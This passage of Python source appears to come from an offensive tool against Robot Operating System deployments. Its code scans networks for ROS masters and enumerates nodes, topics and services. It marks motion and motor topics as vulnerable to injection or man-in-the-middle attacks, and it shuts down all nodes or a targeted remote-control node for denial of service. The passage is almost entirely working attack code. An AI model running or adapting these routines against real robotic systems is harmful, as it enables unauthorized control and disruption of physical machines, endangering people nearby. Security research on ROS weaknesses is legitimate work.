def topicAnalyser(self, host, port, attack):
""" sorts and prints topic and message type information """
vulnerable_topics = ['/sound', '/cmd_vel', '/motor_power']
exploitable_topics = []
rpc = api.XMLRPC_API(host, port)
topics = rpc.getTopicTypes()
if len(topics) > 0 and attack == 'ACI':
[exploitable_topics.append(topic) for topic in topics if topic[0] in vulnerable_topics]
if len(exploitable_topics) > 0:
os.system('clear')
cprint("\r[+] Topics on target that are vulnerable for ACI attack:", 'green', attrs=['bold'])
counter = 1
for topic in exploitable_topics:
print(" [" + str(counter) + "] '{}' with message type '{}'".
format(topic[0], topic[1]))
counter += 1
return exploitable_topics
elif len(topics) > 0 and attack == 'MITM':
for topic in topics:
if topic[0] == '/cmd_vel':
return True
def execShutdown(self, host, port, nodes):
""" executing the shutdown XML API """
while True:
try:
option = int(input("\nSelect node to shutdown: "))
if option in range(len(nodes) + 1):
rpc = api.XMLRPC_API(host, port)
rpc.shutdown(nodes[(option - 1)][1])
os.system('clear')
print(
colored(
"[+] Successfully send shutdown command to node: {}"
.format(nodes[(option - 1)][0]),
'green',
attrs=['bold']))
break
else:
sys.stdout.write(colored("\r[!] Invalid input", 'red'))
time.sleep(1.5)
except ValueError:
sys.stdout.write(colored("\r[!] Invalid input", 'red'))
time.sleep(1.5)
def systemRecon(self):
""" sorts and prints getSystemState() information """
active_nodes = []
for host, port in self.master_hosts:
rpc = api.XMLRPC_API(host, port)
publisher, subscriber, service = rpc.getSystemState()
[active_nodes.append(publisher[n][1][0]) for n in range(len(publisher)) if publisher[n][1][0] not in active_nodes]
[active_nodes.append(subscriber[n][1][0]) for n in range(len(subscriber)) if subscriber[n][1][0] not in active_nodes]
cprint("[+] Enumeration of ROS environment " + host + " successfully completed:\n", 'green', attrs=['bold'])
teller = 1
for node in active_nodes:
print(colored(" [" + str(teller) + "] Node: " + node, 'cyan', attrs=['bold']))
print(colored(" Publishing to:", 'white', attrs=['bold']))
for pub in publisher:
if node in pub[1]:
print(" " + pub[0])
print(colored("\n Subscribed to:", 'white', attrs=['bold']))
for sub in subscriber:
if node in sub[1]:
print(" " + sub[0])
print(colored("\n Services:", 'white', attrs=['bold']))
for srv in service:
if node in srv[1]:
print(" " + srv[0])
print()
teller += 1
def execDoS(self, host, port):
""" shutting down nodes """
rpc = api.XMLRPC_API(host, port)
nodes = rpc.filterNodes()
if len(nodes) > 0:
for node in nodes:
rpc.shutdown(node[1])
def isolateRC(self, host, port, rc_node):
""" executes targeted DoS attack to isolate the remote control host """
rpc = api.XMLRPC_API(host, port)
nodes = rpc.filterNodes()
if len(nodes) > 0:
for node in nodes:
if rc_node[0] == node[0]:
rpc.shutdown(node[1])
def defaultMasterFinder(self):
""" determine default ROS Master """
active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(),
11311).nmapScan()
active_hosts = [
h for h in active_hosts if h != self.ipscan.ipGateway()
]
if len(active_hosts) > 0:
for host in active_hosts:
rpc = api.XMLRPC_API(host, 11311)
if rpc.masterCheck() == True:
self.found_master_hosts.append([host, 11311])
def nodesAnalyser(self, host, port):
""" sorts and prints node, URI and PID information """
rpc = api.XMLRPC_API(host, port)
nodes = rpc.filterNodes()
if len(nodes) > 0:
os.system('clear')
cprint("\r[+] Running node(s) on target:", 'green', attrs=['bold'])
counter = 1
for node in nodes:
print(" [" + str(counter) + "] Node: {} \n URI: {} \n PID: {}".
format(node[0], node[1], node[2]))
counter += 1
return nodes
def topicRecon(self):
""" sorts and prints getTopicTypes() information """
vulnerable_topics = ['/sound', '/cmd_vel', '/motor_power']
for host, port in self.master_hosts:
rpc = api.XMLRPC_API(host, port)
topics = rpc.getTopicTypes()
if len(topics) > 0:
cprint("\n[+] Identified topics and message types on target: {}".format(host), 'green', attrs=['bold'])
counter = 1
for topic in topics:
if topic[0] in vulnerable_topics:
cprint(" [" + str(counter) + "] [VULNERABLE] '{}' with message type '{}'".
format(topic[0], topic[1]), 'red')
counter += 1
else:
print(" [" + str(counter) + "] '{}' with message type '{}'".format(topic[0], topic[1]))
counter += 1
else:
cprint("\n[-] No active topics are found on the target system: {}".format(host), 'red', attrs=['bold'])
def definedMasterFinder(self):
""" determine custom defined ROS Master """
for port in range((self.port_range_start + self.port_range_counter),
self.port_range_end):
self.port_range_counter += 1
if port == 11311:
continue
self.temp_masters_bin = []
active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(),
port).nmapScan()
active_hosts = [
h for h in active_hosts if h != self.ipscan.ipGateway()
]
if len(active_hosts) > 0:
for host in active_hosts:
rpc = api.XMLRPC_API(host, port)
if rpc.masterCheck() == True:
self.found_master_hosts.append([host, port])
self.temp_masters_bin.append([host, port])
return